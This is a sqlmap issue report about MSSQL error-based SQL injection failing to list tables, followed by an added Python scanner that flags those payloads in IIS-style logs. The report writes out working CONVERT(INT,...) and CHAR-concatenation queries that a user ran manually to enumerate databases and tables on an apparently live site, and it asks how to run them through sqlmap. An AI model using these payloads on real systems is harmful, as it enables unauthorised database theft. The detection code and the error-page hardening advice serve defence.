Description
Running environment:
- sqlmap version [1.6.12.1#dev]
- Installation method [e.g. git]
- Operating system: [Microsoft Windows 10]
- Python version [2.7]
Target details:
- DBMS : Microsoft SQL Server
- SQLi techniques found by sqlmap:
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: Id=30053 AND 3172 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3172=3172) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(112)+CHAR(113)))
I've a problem with SQLMap when I try to exploit data from a website that has 2 (Boolean- and error-based) SQL injections.
SQLMap successfully got the database names but failed to get the table names.
sqlmap.py -r "HFiles\HF5998_6153.txt" --level=5 --risk=3 -p "Id" --no-cast --batch -D "{{database_name}}" --tables --ignore-code=500
.....
....
...
[14:51:23] [INFO] testing Microsoft SQL Server
[14:51:23] [INFO] confirming Microsoft SQL Server
[14:51:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2016
[14:51:23] [INFO] fetching tables for database: {{database_name}}
[14:51:23] [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
[14:51:24] [WARNING] reflective value(s) found and filtering out
[14:51:24] [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
[14:51:25] [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
[14:51:26] [CRITICAL] unable to retrieve the tables for any database
[14:51:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[*] ending @ 14:51:26 /2023-01-02/
I thought it was a WAF issue at first because it kept getting 500 errors,
even though I asked sqlmap to ignore them, but nothing changed.
After this I tried to forward sqlmap's requests through the Burp Suite proxy and check the requests and responses.
I got the following screenshot:
SQLmap request: Id=3962412 AND 3960 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT SUBSTRING((name),1,1024) FROM MSP..sysobjects WHERE xtype=CHAR(85))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(112)+CHAR(113)))
https://i.snipboard.io/f97Nxu.jpg
As you can see, the response has a 500 error but still gives you data,
and sqlmap's request returned more than one value, which is not supported, as shown.
And now my manual attempt:
Get Databases count
Id=30076 AND 1=CONVERT(INT,(CHAR(120)+CHAR(120)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]..[sysdatabases])+CHAR(120)+CHAR(120)))
https://i.snipboard.io/NeIUxh.jpg
Get Tables count
Id=30076 AND 1=CONVERT(INT,(CHAR(120)+CHAR(120)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [{{database_name}}]..[sysobjects] WHERE xtype = 'U')+CHAR(120)+CHAR(120)))
https://i.snipboard.io/ucsbOl.jpg
Get Database Tables one by one {{N}}
30076 AND 1=CONVERT(INT,(CHAR(120)+CHAR(120)+(SELECT DISTINCT top 1 [name] FROM (SELECT DISTINCT top {{N}} [name] FROM [{{database_name}}]..[sysobjects] WHERE xtype = 'U' ORDER BY [name] ASC) sq ORDER BY [name] DESC)+CHAR(120)+CHAR(120)))
https://i.snipboard.io/8Ly4Md.jpg
And by the way, I tried all the available tampers; nothing works.
And is there a way I can use these queries in sqlmap?
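The report above shows two things a defender can act on: the error-based payloads have a recognisable shape (CHAR() concatenation, CONVERT(INT, ...), IN (SELECT ...), system catalog names, nested TOP n / ORDER BY row walking), and the HTTP 500 responses still carried the extracted value. The following is an added example, not sqlmap's code and not the reporter's; it scans constructed IIS-style log lines for those indicators and rates a hit that coincided with a 5xx response as high. The log field layout (date, time, client IP, method, URI stem, query string, status), the database name EXAMPLEDB, the value 3 for {{N}} and the client addresses are assumptions made for the sample; the payload text is taken from the report.

```python
import re
from urllib.parse import parse_qs, quote_plus

# Case-insensitive signatures for the MSSQL error-based extraction patterns
# visible in the report, matched against each decoded parameter value.
INDICATORS = {
    "convert_int_error_based": re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I),
    "in_select_error_based": re.compile(r"\bIN\s*\(\s*SELECT\b", re.I),
    "char_concat_chain": re.compile(
        r"(?:CHAR\s*\(\s*\d+\s*\)\s*\+\s*)+CHAR\s*\(\s*\d+\s*\)", re.I),
    "system_catalog": re.compile(r"\bsys(?:objects|databases)\b", re.I),
    # TOP n plus two ORDER BY clauses: fetching catalog rows one at a time
    "top_n_row_walk": re.compile(
        r"\bTOP\s+\d+\b.*\bORDER\s+BY\b.*\bORDER\s+BY\b", re.I | re.S),
}


def match_indicators(value):
    """Return the names of all indicators that match one decoded value."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def parse_w3c_line(line):
    """Split one constructed IIS W3C-style line into fields. Assumed order:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status (a subset
    of the real W3C field set; adjust to the fields your server logs)."""
    date, time, c_ip, method, stem, query, status = line.split(" ", 6)
    return {"time": f"{date} {time}", "client": c_ip, "method": method,
            "uri": stem, "query": query, "status": int(status)}


def scan_log(lines):
    """Flag requests whose parameters carry error-based SQLi indicators.
    A hit that also produced a 5xx is rated high, because in the report the
    500 page still leaked the converted value."""
    findings = []
    for line in lines:
        rec = parse_w3c_line(line)
        params = parse_qs(rec["query"], keep_blank_values=True)
        for param, values in params.items():
            for value in values:
                hits = match_indicators(value)
                if hits:
                    findings.append({
                        "time": rec["time"], "client": rec["client"],
                        "uri": rec["uri"], "param": param,
                        "status": rec["status"], "indicators": hits,
                        "severity": "high" if rec["status"] >= 500 else "medium",
                    })
    return findings


def _w3c_line(time, client, query, status):
    """Build one constructed log line in the layout parse_w3c_line expects."""
    return f"2023-01-02 {time} {client} GET /item.aspx {query} {status}"


# Constructed sample: payload text from the report, with the database name
# replaced by EXAMPLEDB (placeholder) and {{N}} set to 3; client addresses
# are documentation ranges. quote_plus mimics what the server logs.
_P_ERROR_IN = ("30053 AND 3172 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113)"
               "+(SELECT (CASE WHEN (3172=3172) THEN CHAR(49) ELSE CHAR(48) END))"
               "+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(112)+CHAR(113)))")
_P_COUNT_DBS = ("30076 AND 1=CONVERT(INT,(CHAR(120)+CHAR(120)+(SELECT top 1 CAST(COUNT([name]) "
                "AS nvarchar(4000)) FROM [master]..[sysdatabases])+CHAR(120)+CHAR(120)))")
_P_ROW_WALK = ("30076 AND 1=CONVERT(INT,(CHAR(120)+CHAR(120)+(SELECT DISTINCT top 1 [name] FROM "
               "(SELECT DISTINCT top 3 [name] FROM [EXAMPLEDB]..[sysobjects] WHERE xtype = 'U' "
               "ORDER BY [name] ASC) sq ORDER BY [name] DESC)+CHAR(120)+CHAR(120)))")

SAMPLE_LOG = [
    _w3c_line("14:50:01", "198.51.100.20", "Id=30053", 200),                         # benign
    _w3c_line("14:51:23", "203.0.113.7", "Id=" + quote_plus(_P_ERROR_IN), 500),
    _w3c_line("14:51:24", "203.0.113.7", "Id=" + quote_plus(_P_COUNT_DBS), 500),
    _w3c_line("14:51:25", "203.0.113.7", "Id=" + quote_plus(_P_ROW_WALK), 500),
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["client"], f["severity"], f["param"],
              f["status"], ",".join(f["indicators"]))
```

The benign request produces no finding; the three payload requests are each flagged high because they match at least two indicators and returned a 500. Besides detection, the 500 response carrying query output is the thing to fix on the application side: a generic error page that does not echo the database exception removes the channel that both sqlmap's error-based technique and the manual CONVERT(INT, ...) queries rely on.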